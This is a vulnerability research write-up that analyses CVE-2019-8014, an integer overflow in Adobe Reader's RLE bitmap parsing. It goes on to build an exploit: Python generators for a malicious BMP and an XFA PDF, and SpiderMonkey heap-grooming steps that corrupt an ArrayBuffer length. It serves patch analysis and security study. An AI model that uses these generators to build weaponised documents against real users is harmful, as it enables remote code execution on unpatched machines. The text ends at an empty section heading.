Deep Analysis of CVE-2019-8014: The Vulnerability Ignored 6 Years Ago

This post provides detailed analysis for CVE-2019-8014 which was fixed in Adobe Acrobat Reader / Pro DC recently. Interestingly, it’s a patch bypass of CVE-2013-2729 which was fixed six years ago. This post also discusses how to exploit the vulnerability.

Author: Ke Liu of Tencent Security Xuanwu Lab

0x01. Introduction

Adobe released security updates for Adobe Acrobat and Reader in APSB19-41 in August. As usual, lots of vulnerabilities were fixed in the updates. When I was reviewing the corresponding advisories on ZDI , my attention was attracted by one of them: ZDI-19-725 / CVE-2019-8014 . Following text is the title and description of this case:

Adobe Acrobat Pro DC AcroForm Bitmap File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability

The specific flaw exists within the parsing of run length encoding in BMP images. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length, heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process.

What surprised me most is that the flaw exists within the parsing of run length encoding in BMP images because I remembered that six years ago a similar case CVE-2013-2729 was fixed in Adobe Reader. If you have the same wondering that what’s the relationship between CVE-2013-2729 and CVE-2019-8014, then let me reveal the truth for you.

By the way, the credit of CVE-2019-8014 goes to ktkitty (https://ktkitty.github.io) .

0x02. Debugging Environment

Before diving deep into the details of the vulnerability, let’s set up the debugging environment first. According to APSB19-41 , 2019.012.20035 and earlier versions of Adobe Acrobat and Reader on Windows were affected, and the released version was 2019.012.20036 . We’ll carry out our analysis on these two versions.

Steps to install Adobe Acrobat Reader DC 2019.012.20035 :

Download and install 2019.012.20034 (Download Link)
Upgrade to 2019.012.20035 (Download Link)

Steps to install Adobe Acrobat Reader DC 2019.012.20036 :

Download and install 2019.012.20036 (Download Link)

Please remember to disconnect the Internet or disable the Adobe Acrobat Update Service , otherwise your Adobe Acrobat Reader DC will be updated automatically.

0x03. Bitmap Structures

Again, before diving deep into the details of the vulnerability, let’s learn some essential concepts of bitmap images. You can skip this section if you’re already familiar with it.

3.1 Structures

Generally speaking, a bitmap image is composed of four parts:

Bitmap File Header
Bitmap Info Header
RGBQUAD Array
Bitmap Data

3.1.1 Bitmap File Header

The BITMAPFILEHEADER structure contains information about the type, size, and layout of the bitmap file. Following is the definition of this structure:

typedef struct tagBITMAPFILEHEADER {
  WORD  bfType;         // 'BM'
  DWORD bfSize;         // size of the bitmap file
  WORD  bfReserved1;    // 0
  WORD  bfReserved2;    // 0
  DWORD bfOffBits;      // offset of the bitmap bits
} BITMAPFILEHEADER, *LPBITMAPFILEHEADER, *PBITMAPFILEHEADER;

3.1.2 Bitmap Info Header

The BITMAPINFOHEADER structure contains information about the dimensions and color format of the bitmap file. Following is the definition of this structure:

typedef struct tagBITMAPINFOHEADER {
  DWORD biSize;             // sizeof(BITMAPINFOHEADER)
  LONG  biWidth;            // bitmap width
  LONG  biHeight;           // bitmap height
  WORD  biPlanes;           // must be 1
  WORD  biBitCount;         // bits per pixel
  DWORD biCompression;      // compression method
  DWORD biSizeImage;        // size of bitmap bits
  LONG  biXPelsPerMeter;    // horizontal resolution, pixels-per-meter
  LONG  biYPelsPerMeter;    // vertical resolution, pixels-per-meter
  DWORD biClrUsed;          // number of color indexes in the color table
  DWORD biClrImportant;     // number of color indexes that are required
} BITMAPINFOHEADER, *PBITMAPINFOHEADER;

The value of biCompression represents the compression method of the bitmap. Following are some of the possible values of it:

#define BI_RGB  0  // uncompressed format
#define BI_RLE8 1  // run-length encoded (RLE) format with 8 bpp
#define BI_RLE4 2  // run-length encoded (RLE) format with 4 bpp
// other compression methods...

3.1.3 RGBQUAD Array

The RGBQUAD structure describes a color consisting of relative intensities of red, green, and blue. Following is the definition of this structure:

typedef struct tagRGBQUAD {
  BYTE rgbBlue;
  BYTE rgbGreen;
  BYTE rgbRed;
  BYTE rgbReserved;
} RGBQUAD;

The elements of the RGBQUAD array make up the color table. The number of entries in the array depends on the values of the biBitCount and biClrUsed members of the BITMAPINFOHEADER structure.

3.1.4 Bitmap Data

Bits data of the bitmap. The layout of this section depends on the compression method of the bitmap.

One thing should be noted is that usually pixels are stored “bottom-up”, starting in the lower left corner, going from left to right, and then row by row from the bottom to the top of the image [wikipedia].

3.2 Run Length Encoding

Two types of run length encoding methods can be used in bitmap files: RLE4 and RLE8 .

3.2.1 RLE8

The RLE8 compression algorithm is used to compress an 8-bit bitmap. This format specifies encoded and absolute modes, and either mode can occur anywhere in a given bitmap.

Encoded mode involves two bytes:

If the first byte of a pair is greater than zero, it specifies the number of consecutive pixels to be drawn using the color index that is contained in the second byte.
If the first byte of a pair is zero and the second byte is 0x02 or less, the second byte is an escape value that can denote the end of a line, the end of the bitmap, or a relative pixel position, as follows.
- 0x00 - End of line
- 0x01 - End of bitmap
- 0x02 - Delta

When a delta is specified, the 2 bytes following the escape value contain unsigned values indicating the horizontal and vertical offsets of the next pixel relative to the current position.

In absolute mode, the first byte is zero, and the second byte is a value in the range 0x03 through 0xFF. The second byte represents the number of bytes that follow, each of which contains the color index of a single pixel. In absolute mode, each run is aligned on a word boundary.

The following example shows the hexadecimal contents of an 8-bit compressed bitmap:

1 2	[03 04] [05 06] [00 03 45 56 67] [02 78] [00 02 05 01] [02 78] [00 00] [09 1E] [00 01]

The bitmap expands as follows (two-digit values represent a color index for a single pixel):

04 04 04
06 06 06 06 06
45 56 67
78 78
move current position 5 right and 1 up
78 78
end of line
1E 1E 1E 1E 1E 1E 1E 1E 1E
end of RLE bitmap

3.2.2 RLE4

The RLE4 compression algorithm is used to compress a 4-bit bitmap. This format specifies encoded and absolute modes, and either mode can occur anywhere in a given bitmap.

Encoded mode involves two bytes. If the first byte of a pair is greater than zero, it specifies the number of consecutive pixels to be drawn using the two color indexes that are contained in the high-order and low-order bits of the second byte.

The first pixel is drawn using the color specified by the high-order 4 bits, the second is drawn using the color in the low-order 4 bits, the third is drawn using the color in the high-order 4 bits, and so on, until all the pixels specified by the first byte have been drawn.

If the first byte of a pair is zero and the second byte is 0x02 or less, the second byte is an escape value that can denote the end of a line, the end of the bitmap, or a relative pixel position, as follows.

0x00 - End of line
0x01 - End of bitmap
0x02 - Delta

When a delta is specified, the 2 bytes following the escape value contain unsigned values indicating the horizontal and vertical offsets of the next pixel relative to the current position.

In absolute mode, the first byte is zero, and the second byte is a value in the range 0x03 through 0xFF. The second byte contains the number of 4-bit color indexes that follow. Subsequent bytes contain color indexes in their high- and low-order 4 bits, one color index for each pixel. In absolute mode, each run is aligned on a word boundary.

The following example shows the hexadecimal contents of a 4-bit compressed bitmap:

1 2	[03 04] [05 06] [00 06 45 56 67 00] [04 78] [00 02 05 01] [04 78] [00 00] [09 1E] [00 01]

The bitmap expands as follows:

0 4 0
0 6 0 6 0
4 5 5 6 6 7
7 8 7 8
move current position 5 right and 1 up
7 8 7 8
end of line
1 E 1 E 1 E 1 E 1
end of RLE bitmap

0x04. Vulnerability Details

4.1 Code Identification

According to the advisory on ZDI’s website, we know that the flaw exists within the AcroForm module. It’s the forms plug-in of Adobe Acrobat Reader DC and is responsible for parsing XFA forms . Following is the path of binary file of this plug-in:

1	%PROGRAMFILES(X86)%\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm.api

Generally speaking, when doing patch analysis we may want to use BinDiff to help identify the changed functions between the old and new versions of the binary file. But it won’t be easy to find the target one if too many functions were changed. And that’s the case of AcroForm.api . Here we’ll use some trivial tricks to identify the related functions.

The following analysis was carried out on Adobe Acrobat Reader DC 2019.012.20035 . The same method can be applied to version 2019.012.20036 .

Search string PNG in IDA and we’ll find one at .rdata:20F9A374
Find cross references to 20F9A374 and we’ll go to function sub_20CF3A3F
Obviously function sub_20CF3A3F is responsible for identifying the type of the image
Find cross references to sub_20CF3A3F and we’ll go to function sub_20CF4BE8
Function sub_20CF4BE8 will call corresponding image parsing functions according to image types
Function sub_20CF3E5F , which will be called by function sub_20CF4870 , is responsible for parsing bitmap images

The result of BinDiff shows that some basic blocks were changed in function sub_20CF3E5F . Let’s take the basic block which begins at 20CF440F as an example to show the difference.

// 20CF440F in AcroForm 2019.012.20035
if ( v131 >= v26 || (unsigned __int8)v127 + v43 > v123 )
  goto LABEL_170;

// 20CF501F in AcroForm 2019.012.20036
v56 = (unsigned __int8)v130 + v43;
if ( v134 >= v26 || v56 > v126 || v56 < v43 || v56 < (unsigned __int8)v130 )
  goto LABEL_176;

It’s obvious that the code was changed to prevent integer overflow circumstances.

4.2 Vulnerability Analysis

Thanks to feliam’s write up for CVE-2013-2729 , we can quickly understand what’s going on in function sub_20CF3E5F .

4.2.1 RLE8 Decoding

Following pseudo code, which was extracted from function sub_20CF3E5F , was responsible for parsing the RLE8 compressed data.

if ( bmih.biCompression == 1 )  // RLE8 algorithm
{
  xpos = 0;                     // unsigned int, from left to right
  ypos = bmih.biHeight - 1;     // unsigned int, from bottom to top
  bitmap_ends = 0;
  result = fn_feof(v1[2]);
  if ( !result )
  {
    do
    {
      if ( bitmap_ends )
        return result;
      fn_read_bytes(v1[2], &cmd, 2u);           // read 2 bytes
      if ( (_BYTE)cmd )                         // first byte != 0
      {                                         // means have compressed data
        // 20CF440F, this basic block was patched in the updated binary file
        if ( ypos >= height || (unsigned __int8)cmd + xpos > width )
          goto LABEL_170;                       // CxxThrowException
        index = 0;
        if ( (_BYTE)cmd )
        {
          do
          {
            line = (_BYTE *)fn_get_scanline(v1[3], ypos);
            line[xpos++] = BYTE1(cmd);
            ++index;
          }
          while ( index < (unsigned __int8)cmd ); // uncompress data
        }
      }
      else if ( BYTE1(cmd) )        // first byte = 0, second byte != 0
      {
        if ( BYTE1(cmd) == 1 )      // end of bitmap
        {
          bitmap_ends = 1;
        }
        else if ( BYTE1(cmd) == 2 ) // delta
        {
          fn_read_bytes(v1[2], &xdelta, 1u);
          fn_read_bytes(v1[2], &ydelta, 1u);
          xpos += xdelta;           // move to right
          ypos -= ydelta;           // move to up
        }
        else                        // uncompressed data
        {
          dst_xpos = BYTE1(cmd) + xpos;
          if ( ypos >= height || dst_xpos < xpos || 
               dst_xpos < BYTE1(cmd) || dst_xpos > width )  // overflow check
            goto LABEL_170;         // CxxThrowException
          index = 0;
          if ( BYTE1(cmd) )
          {
            do
            {
              fn_read_bytes(v1[2], &value, 1u);
              line = (_BYTE *)fn_get_scanline(v1[3], ypos);
              line[xpos++] = value;
              count = BYTE1(cmd);
              ++index;
            }
            while ( index < BYTE1(cmd) );   // uncompressed data
          }
          if ( count & 1 )                  // alignment
            fn_read_bytes(v1[2], &value, 1u);
        }
      }
      else                                  // end of line
      {
        --ypos;                             // move to next line
        xpos = 0;
      }
      result = fn_feof(v1[2]);
    }
    while ( !result );
  }
}

Based on previous patch analysis, it’s obvious that integer overflow can be triggered in the following if statement.

// 20CF440F, this basic block was patched in the updated binary file
if ( ypos >= height || (unsigned __int8)cmd + xpos > width )
  goto LABEL_170;                       // CxxThrowException

// 20CF501F in AcroForm 2019.012.20036
dst_xpos = (unsigned __int8)cmd + xpos;
if ( ypos >= height || dst_xpos > width || 
     dst_xpos < xpos || dst_xpos < (unsigned __int8)cmd )
  goto LABEL_176;

The flaw exists within the arithmetic computation of (unsigned __int8)cmd + xpos . Here the value of both variables can be controlled by the attacker. And Out-Of-Bounds write can be triggered when decompressing RLE8 compressed data.

The value of (unsigned __int8)cmd can be controlled directly in the bitmap file

1	fn_read_bytes(v1[2], &cmd, 2u); // read 2 bytes

The value of xpos can be controlled by arranging lots of delta commands in encoded mode

else if ( BYTE1(cmd) == 2 ) // delta
{
  fn_read_bytes(v1[2], &xdelta, 1u);
  fn_read_bytes(v1[2], &ydelta, 1u);
  xpos += xdelta;           // move to right, add any value in [0, 255]
  ypos -= ydelta;           // move to up
}

Out-Of-Bounds write can be triggered when decompressing RLE8 compressed data

index = 0;
do
{
  line = (_BYTE *)fn_get_scanline(v1[3], ypos);
  line[xpos++] = BYTE1(cmd);            // OOB write with constrolled data
  ++index;
}
while ( index < (unsigned __int8)cmd ); // uncompress data

4.2.2 RLE4 Decoding

Following pseudo code, which was also extracted from function sub_20CF3E5F , was responsible for parsing the RLE4 compressed data. The decoding process was almost the same, but it’s a little more complicated than RLE8 since the data unit was not a byte.

if ( bmih.biCompression == 2 )  // RLE4 algorithm
{
  xpos = 0;                     // unsigned int, from left to right
  ypos = bmih.biHeight - 1;     // unsigned int, from bottom to top
  bitmap_ends = 0;
  odd_index_ = 0;
  if ( !fn_feof(v1[2]) )
  {
    do
    {
      if ( bitmap_ends )
        return result;
      fn_read_bytes(v1[2], &cmd, 2u);       // read 2 bytes
      if ( (_BYTE)cmd )                     // first byte != 0
      {                                     // means have compressed data
        high_4bits = BYTE1(cmd) >> 4;       // high-order 4 bits
        low_4bits = BYTE1(cmd) & 0xF;       // low-order 4 bits
        // 20CF45F8, this basic block was patched in the updated binary file
        if ( ypos >= height || (unsigned __int8)cmd + xpos > width )
          goto LABEL_170;                   // CxxThrowException
        index = 0;
        if ( (_BYTE)cmd )
        {
          xpos_ = odd_index_;
          do
          {
            byte_slot = xpos_ >> 1;
            odd_index = index & 1;
            line = fn_get_scanline(v1[3], ypos);
            _4bits = high_4bits;            // even index -> high-order 4 bits
            if ( odd_index )                // odd index -> low-order 4 bits
              _4bits = low_4bits;
            if ( xpos_ & 1 )                // odd xpos, old byte
            {
              line[byte_slot] |= _4bits;
            }
            else                            // even xpos, new byte
            {
              line[byte_slot] = 16 * _4bits;
            }
            ++xpos_;
            index = index + 1;
          }
          while ( index < (unsigned __int8)cmd );
          odd_index_ = xpos_;
          xpos = odd_index_;
        }
      }
      else if ( BYTE1(cmd) )                // first byte = 0, second byte != 0
      {
        if ( BYTE1(cmd) == 1 )              // end of bitmap
        {
          bitmap_ends = 1;
        }
        else if ( BYTE1(cmd) == 2 )         // delta
        {
          fn_read_bytes((_DWORD *)v1[2], &xdelta, 1u);
          fn_read_bytes((_DWORD *)v1[2], &ydelta, 1u);
          xpos += xdelta;                   // move to right
          ypos -= ydelta;                   // move to up
          odd_index_ = xpos;
        }
        else
        {
          // 20CF44EA, this basic block was patched in the updated binary file
          if ( ypos >= height || BYTE1(cmd) + xpos > width )
            goto LABEL_170;                 // CxxThrowException
          index = 0;
          odd_index = 0;
          if ( BYTE1(cmd) )                 // uncompressed data
          {
            xpos_ = odd_index_;
            do
            {
              odd_index_ = index & 1;
              if ( !(index & 1) )           // read 1 byte data
              {
                fn_read_bytes((_DWORD *)v1[2], &value, 1u);
                low_4bits_ = value & 0xF;   // low-order 4 bits
                high_4bits_ = value >> 4;   // high-order 4 bits
              }
              byte_slot = xpos_ >> 1;
              line = fn_get_scanline(v1[3], ypos);
              _4bits = high_4bits_;
              if ( odd_index_ )
                _4bits = low_4bits_;
              if ( xpos_ & 1 )
              {
                line[byte_slot] |= _4bits;
              }
              else
              {
                line[byte_slot] = 16 * _4bits;
              }
              ++xpos_;
              count = BYTE1(cmd);
              not_ended = odd_index++ + 1 < BYTE1(cmd);
              index = odd_index;
            }
            while ( not_ended );
            odd_index_ = xpos_;
            xpos = odd_index_;
          }
          if ( (count & 3u) - 1 <= 1 )      // alignment
            fn_read_bytes(v1[2], &value, 1u);
        }
      }
      else                                  // end of line
      {
        --ypos;                             // move to next line
        xpos = 0;
        odd_index_ = 0;
      }
      result = fn_feof((_DWORD *)v1[2]);
    }
    while ( !result );
  }
}

Integer overflow can be triggered in two spots, one exists within the handling of compressed data:

high_4bits = BYTE1(cmd) >> 4;       // high-order 4 bits
low_4bits = BYTE1(cmd) & 0xF;       // low-order 4 bits
// 20CF45F8, this basic block was patched in the updated binary file
if ( ypos >= height || (unsigned __int8)cmd + xpos > width )
  goto LABEL_170;                   // CxxThrowException

Another one exists within the handling of uncompressed data:

1
2
3

// 20CF44EA, this basic block was patched in the updated binary file
if ( ypos >= height || BYTE1(cmd) + xpos > width )
  goto LABEL_170;                 // CxxThrowException

0x05. Exploit

5.1 Overflow Candidate

Three integer overflows were found within the function. Here we’ll choose the one within the handling of RLE8 data. It’s more exploit friendly than the others.

In terms of RLE4 data decoding, the value of xpos will be divided by 2 when putting data into the scan line. The maximum offset value for the scan line is 0xFFFFFFFF / 2 = 0x7FFFFFFF , it means that we can only write forward and the address we are trying to write is probably out of our control.

For RLE8 data decoding, the offset value for the scan line is xpos itself, thus we can write backward and the distance can be controlled. In the following if statement, the maximum value of (unsigned __int8)cmd is 0xFF . And to bypass the check, the minimum value of xpos is 0xFFFFFF01 which should be -255 in signed int form. In other words, we can write backward as large as 0xFF bytes.

1
2
3

// 20CF440F, this basic block was patched in the updated binary file
if ( ypos >= height || (unsigned __int8)cmd + xpos > width )
  goto LABEL_170;                       // CxxThrowException

However, the interval we’re trying to write can only be filled with the same value. This will cause some problems when writing exploit, it will be explained later.

index = 0;
do
{
  line = (_BYTE *)fn_get_scanline(v1[3], ypos);
  line[xpos++] = BYTE1(cmd);
  ++index;
}
while ( index < (unsigned __int8)cmd );

5.2 SpiderMonkey Concepts

Adobe Reader uses SpiderMonkey as its JavaScript engine. Before writing the exploit, let’s learn some essential knowledge of the SpiderMonkey engine.

5.2.1 ArrayBuffer

When the value of byteLength is greater than 0x68 , the backing store of the ArrayBuffer object will be allocated from system heap (through ucrtbase!calloc), otherwise it will be allocated from SpiderMonkey’s tenured heap . Also, when allocating from system heap, the underlying heap buffer will be 0x10 bytes larger to store the ObjectElements object.

class ObjectElements {
 public:
  uint32_t flags;               // can be any value, default is 0
  uint32_t initializedLength;   // byteLength
  uint32_t capacity;            // pointer of associated view object
  uint32_t length;              // can be any value, default is 0
 // ......
};

The names of the members in ObjectElements are meaningless for ArrayBuffer . Here the second member holds the byteLength value and the third member holds a pointer of the associated DataView object. The values of the other members are meaningless and can be any digits.

1
2
3

var ab = new ArrayBuffer(0x70);
var dv = new DataView(ab);
dv.setUint32(0, 0x41424344, true);

When executing the above JavaScript code in Adobe Reader, the backing store of the ArrayBuffer object will be looked like this:

;            -, byteLength, viewobj,       -,
34d54f80  00000000 00000070 2458f608 00000000
;         data
34d54f90  41424344 00000000 00000000 00000000
34d54fa0  00000000 00000000 00000000 00000000
34d54fb0  00000000 00000000 00000000 00000000
34d54fc0  00000000 00000000 00000000 00000000
34d54fd0  00000000 00000000 00000000 00000000
34d54fe0  00000000 00000000 00000000 00000000
34d54ff0  00000000 00000000 00000000 00000000

If we can change the value of the byteLength of ArrayBuffer , then we can achieve Out-Of-Bounds access. But be careful with the pointer of the associated DataView object, it can only be 0 or a valid DataView pointer, the process may crash immediately if we change it to some other values.

5.2.2 Array

When the value of length is greater than 14 , the Array object can be allocated from system heap (through ucrtbase!calloc), otherwise it may be allocated from SpiderMonkey’s nursery heap . Also, when allocating from system heap, the underlying heap buffer will be 0x10 bytes larger to store the ObjectElements object.

class ObjectElements {
 public:
  // The NumShiftedElementsBits high bits of this are used to store the
  // number of shifted elements, the other bits are available for the flags.
  // See Flags enum above.
  uint32_t flags;

  /*
   * Number of initialized elements. This is <= the capacity, and for arrays
   * is <= the length. Memory for elements above the initialized length is
   * uninitialized, but values between the initialized length and the proper
   * length are conceptually holes.
   */
  uint32_t initializedLength;

  /* Number of allocated slots. */
  uint32_t capacity;

  /* 'length' property of array objects, unused for other objects. */
  uint32_t length;
 // ......
};


var array = new Array(15);
array[0] = array[array.length - 1] = 0x41424344;

When executing the above JavaScript code in Adobe Reader, the underlying storage buffer of the Array object will be looked like this:

0:010> dd 34cb0f88-10 L90/4
34cb0f78  00000000 0000000f 0000000f 0000000f
34cb0f88  41424344 ffffff81 00000000 ffffff84 ; [0], [1]
34cb0f98  00000000 ffffff84 00000000 ffffff84
34cb0fa8  00000000 ffffff84 00000000 ffffff84
34cb0fb8  00000000 ffffff84 00000000 ffffff84
34cb0fc8  00000000 ffffff84 00000000 ffffff84
34cb0fd8  00000000 ffffff84 00000000 ffffff84
34cb0fe8  00000000 ffffff84 00000000 ffffff84
34cb0ff8  41424344 ffffff81 ???????? ???????? ; [14]

The contents of both array[0] and array[14] are 41424344 ffffff81 , here the higher four bytes of data 0xFFFFFF81 indicates that the type of the element is INT32 . And the contents of the elements within [1, 13] are all filled with 00000000 ffffff84 which means that they’re undefined .

If we can change the values of capacity and length , we can only achieve Out-Of-Bounds write, and the space after the original initialized elements and before the Out-Of-Bounds wrote elements will be filled with 00000000 ffffff84 . That’s some kind of meaningless.

It’s not a good idea to change initializedLength to a large value. This may lead to crash when scanning the array elements during GC. We’ll probably encounter inaccessible memory page and crash the process.

5.2.3 JSObject

In SpiderMonkey, almost all JavaScript objects are inherited from JSObject , and the later class is inherited from ObjectImpl .

class ObjectImpl : public gc::Cell {
  protected:
    HeapPtrShape shape_;
    HeapPtrTypeObject type_;
    HeapSlot *slots;
    HeapSlot *elements;
  // ......
};
    
struct JSObject : public js::ObjectImpl {}

For DataView object, the elements member will point to emptyElementsHeader which can be used to leak the base address of the JavaScript engine module.

static ObjectElements emptyElementsHeader(0, 0);

/* Objects with no elements share one empty set of elements. */
HeapSlot *js::emptyObjectElements =
    reinterpret_cast<HeapSlot *>(uintptr_t(&emptyElementsHeader) + 
    sizeof(ObjectElements));

5.3 Bitmap Construct

Following python code can be used to generate a RLE compressed bitmap image.

#!/usr/bin/env python
#-*- coding:utf-8 -*-
import os
import sys
import struct

RLE8 = 1
RLE4 = 2
COMPRESSION = RLE8
BIT_COUNT = 8
CLR_USED = 1 << BIT_COUNT
WIDTH = 0xF0
HEIGHT = 1

def get_bitmap_file_header(file_size, bits_offset):
    return struct.pack('<2sIHHI', 'BM', file_size, 0, 0, bits_offset)

def get_bitmap_info_header(data_size):
    return struct.pack('<IIIHHIIIIII',
        0x00000028,
        WIDTH,
        HEIGHT,
        0x0001,
        BIT_COUNT,
        COMPRESSION,
        data_size,
        0x00000000,
        0x00000000,
        CLR_USED,
        0x00000000)

def get_bitmap_info_colors():
    # B, G, R, Reserved
    rgb_quad = '\x00\x00\xFF\x00'
    return rgb_quad * CLR_USED

def get_bitmap_data():
    # set ypos to 0 so that we'll be at the beginning of the heap buffer
    # ypos = (HEIGHT - 1) = 0, no need to bother

    # set xpos to 0xFFFFFF00
    data = '\x00\x02\xFF\x00' * (0xFFFFFF00 / 0xFF)
    # set xpos to 0xFFFFFF0C
    data += '\x00\x02\x0C\x00'

    # 0xFFFFFF0C + 0xF4 = 0
    # 0xF4 bytes of 0x10
    data += '\xF4\x10'

    # mark end of bitmap to skip CxxThrowException
    data += '\x00\x01'

    return data

def generate_bitmap(filepath):
    data = get_bitmap_data()
    data_size = len(data)

    bmi_header = get_bitmap_info_header(data_size)
    bmi_colors = get_bitmap_info_colors()

    bmf_header_size = 0x0E
    bits_offset = bmf_header_size + len(bmi_header) + len(bmi_colors)
    file_size = bits_offset + data_size
    bmf_header = get_bitmap_file_header(file_size, bits_offset)
    with open(filepath, 'wb') as f:
        f.write(bmf_header)
        f.write(bmi_header)
        f.write(bmi_colors)
        f.write(data)

if __name__ == '__main__':
    if len(sys.argv) != 2:
        print 'Usage: %s <output.bmp>' % os.path.basename(sys.argv[0])
        sys.exit(1)
    generate_bitmap(sys.argv[1])

Here we’ll generate a RLE8 bitmap with the following parameters:

width is 0xF0
height is 1
bit count is 8

Here the size of the heap buffer will be 0xF0 and we will be able to write 0xF4 bytes backward with value 0x10 .

5.4 PDF Construct

This section explains how to embed the generated BMP image into a PDF file. Following is the PDF template that will be used later.

%PDF-1.7
1 0 obj
<<
    /Type /Catalog
    /AcroForm 5 0 R
    /Pages 2 0 R
    /NeedsRendering true
    /Extensions
    <<
        /ADBE
        <<
            /ExtensionLevel 3
            /BaseVersion /1.7
        >>
    >>
>>
endobj
2 0 obj
<<
    /Type /Pages
    /Kids [3 0 R]
    /Count 1
>>
endobj
3 0 obj
<<
    /Type /Page
    /Parent 2 0 R
    /Contents 4 0 R
    /Resources
    <<
        /Font
        <<
            /F1
            <<
                /BaseFont /Helvetica
                /Subtype /Type1
                /Name /F1
            >>
        >>
    >>
>>
endobj
4 0 obj
<<
    /Length 104
>>
stream
BT
/F1 12 Tf
90 692 Td
(If you see this page, it means that your PDF reader does not support XFA.) Tj
ET
endstream
endobj
5 0 obj
<<
    /XFA 6 0 R
>>
endobj
6 0 obj
<<
    /Filter /FlateDecode
    /Length __STREAM_LENGTH__
>>
stream
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
  <template xmlns:xfa="http://www.xfa.org/schema/xfa-template/3.1/" xmlns="http://www.xfa.org/schema/xfa-template/3.0/">
    <subform name="form1" layout="tb" locale="en_US" restoreState="auto">
      <pageSet>
        <pageArea name="Page1" id="Page1">
          <contentArea x="0.25in" y="0.25in" w="576pt" h="756pt"/>
          <medium stock="default" short="612pt" long="792pt"/>
        </pageArea>
      </pageSet>
      <subform w="576pt" h="756pt">
        <field name="ImageCrash">
          <ui>
            <imageEdit/>
          </ui>
          <value>
            <image aspect="actual" contentType="image/bmp">
__IMAGE_BASE64_DATA__
            </image>
          </value>
        </field>
      </subform>
      <event activity="initialize" name="event__initialize">
        <script contentType="application/x-javascript">
// The JavaScript code will be executed before triggering the vulnerability
        </script>
      </event>
      <event activity="docReady" ref="$host" name="event__docReady">
        <script contentType="application/x-javascript">
// The JavaScript code will be executed after triggering the vulnerability
        </script>
      </event>
    </subform>
  </template>
  <config xmlns="http://www.xfa.org/schema/xci/3.0/">
    <agent name="designer">
      <!--  [0..n]  -->
      <destination>pdf</destination>
      <pdf>
        <!--  [0..n]  -->
        <fontInfo/>
      </pdf>
    </agent>
    <present>
      <!--  [0..n]  -->
      <pdf>
        <!--  [0..n]  -->
        <version>1.7</version>
        <adobeExtensionLevel>5</adobeExtensionLevel>
      </pdf>
      <common/>
      <xdp>
        <packets>*</packets>
      </xdp>
    </present>
  </config>
  <xfa:datasets xmlns:xfa="http://www.xfa.org/schema/xfa-data/1.0/">
    <xfa:data xfa:dataNode="dataGroup"/>
  </xfa:datasets>
  <xfdf xmlns="http://ns.adobe.com/xfdf/" xml:space="preserve">
    <annots/>
  </xfdf>
</xdp:xdp>
endstream
endobj
xref
0 7
0000000000 65535 f 
0000000009 00000 n 
0000000237 00000 n 
0000000306 00000 n 
0000000587 00000 n 
0000000746 00000 n 
0000000782 00000 n 
trailer
<<
    /Root 1 0 R
    /Size 7
>>
startxref
__XREF_OFFSET__
%%EOF

The size of the generated BMP file will be larger than 60MB. And it will be encoded in base64 and embedded within 6 0 obj of the PDF file. To reduce the file size, this object will be compressed using the zlib/deflate compression method.

To exploit the vulnerability, we’ll need to have chances to run JavaScript code before and after triggering the vulnerability. This can be done by putting the JavaScript code within the initialize event and the docReady event.

Following python code can be used to generate the PDF file.

#!/usr/bin/env python
#-*- coding:utf-8 -*-
import os
import sys
import zlib
import base64

def parse_template(template_path):
    with open(template_path, 'rb') as f:
        data = f.read()
    xdp_begin = data.find('<xdp:xdp')
    xdp_end = data.find('</xdp:xdp>') + len('</xdp:xdp>')

    part1 = data[:xdp_begin]
    part2 = data[xdp_begin:xdp_end]
    part3 = data[xdp_end:]
    return part1, part2, part3

def generate_pdf(image_path, template_path, pdf_path):
    pdf_part1, pdf_part2, pdf_part3 = parse_template(template_path)

    with open(image_path, 'rb') as f:
        image_data = base64.b64encode(f.read())
    pdf_part2 = pdf_part2.replace('__IMAGE_BASE64_DATA__', image_data)
    pdf_part2 = zlib.compress(pdf_part2)

    pdf_part1 = pdf_part1.replace('__STREAM_LENGTH__', '%d' % len(pdf_part2))

    pdf_data = pdf_part1 + pdf_part2 + pdf_part3
    pdf_data = pdf_data.replace('__XREF_OFFSET__', '%d' % pdf_data.find('xref'))

    with open(pdf_path, 'wb') as f:
        f.write(pdf_data)

if __name__ == '__main__':
    if len(sys.argv) != 4:
        filename = os.path.basename(sys.argv[0])
        print 'Usage: %s <input.bmp> <template.pdf> <output.pdf>' % filename
        sys.exit(1)
    generate_pdf(sys.argv[1], sys.argv[2], sys.argv[3])

5.5 Exploit Tricks

5.5.1 Memory Layout (1)

In this case, ArrayBuffer is more suitable for exploiting the vulnerability.

Firstly, we can create lots of ArrayBuffer objects with byteLength setting to 0xE0 . And free one ArrayBuffer object of every ArrayBuffer pair to create holes.

┌─────────────┬─────────────┬─────────────┬─────────────┐
│ ArrayBuffer │     Hole    │ ArrayBuffer │     Hole    │
└─────────────┴─────────────┴─────────────┴─────────────┘
│ <-  0xF0 -> │

Then we trigger the vulnerability, and the heap buffer of the bitmap will be placed in one of the holes.

1
2
3

┌─────────────┬─────────────┬─────────────┬─────────────┐
│ ArrayBuffer │ Bitmap Data │ ArrayBuffer │     Hole    │
└─────────────┴─────────────┴─────────────┴─────────────┘

Since we are able to write 0xF4 bytes backward with value 0x10 . The backing store of the ArrayBuffer will be filled with 0x10 .

0:014> dd 304c8398
;            -, byteLength, viewobj,       -,
304c8398  00000000 10101010 10101010 10101010
;         ArrayBuffer data
304c83a8  10101010 10101010 10101010 10101010
304c83b8  10101010 10101010 10101010 10101010
304c83c8  10101010 10101010 10101010 10101010
304c83d8  10101010 10101010 10101010 10101010
304c83e8  10101010 10101010 10101010 10101010
304c83f8  10101010 10101010 10101010 10101010
304c8408  10101010 10101010 10101010 10101010
304c8418  10101010 10101010 10101010 10101010
304c8428  10101010 10101010 10101010 10101010
304c8438  10101010 10101010 10101010 10101010
304c8448  10101010 10101010 10101010 10101010
304c8458  10101010 10101010 10101010 10101010
304c8468  10101010 10101010 10101010 10101010
304c8478  10101010 10101010 10101010 10101010 ; end of ArrayBuffer
; metadata of next heap buffer (bitmap data)
304c8488  10101010 10101010
; bitmap data begins here
304c8490                    00000000 00000000

Now the byteLength of the ArrayBuffer object has been changed to 0x10101010 and we can achieve Out-Of-Bounds access now. So far so good? The fact is that the process will crash immediately since we also changed the DataView pointer.

5.5.2 Memory Layout (0)

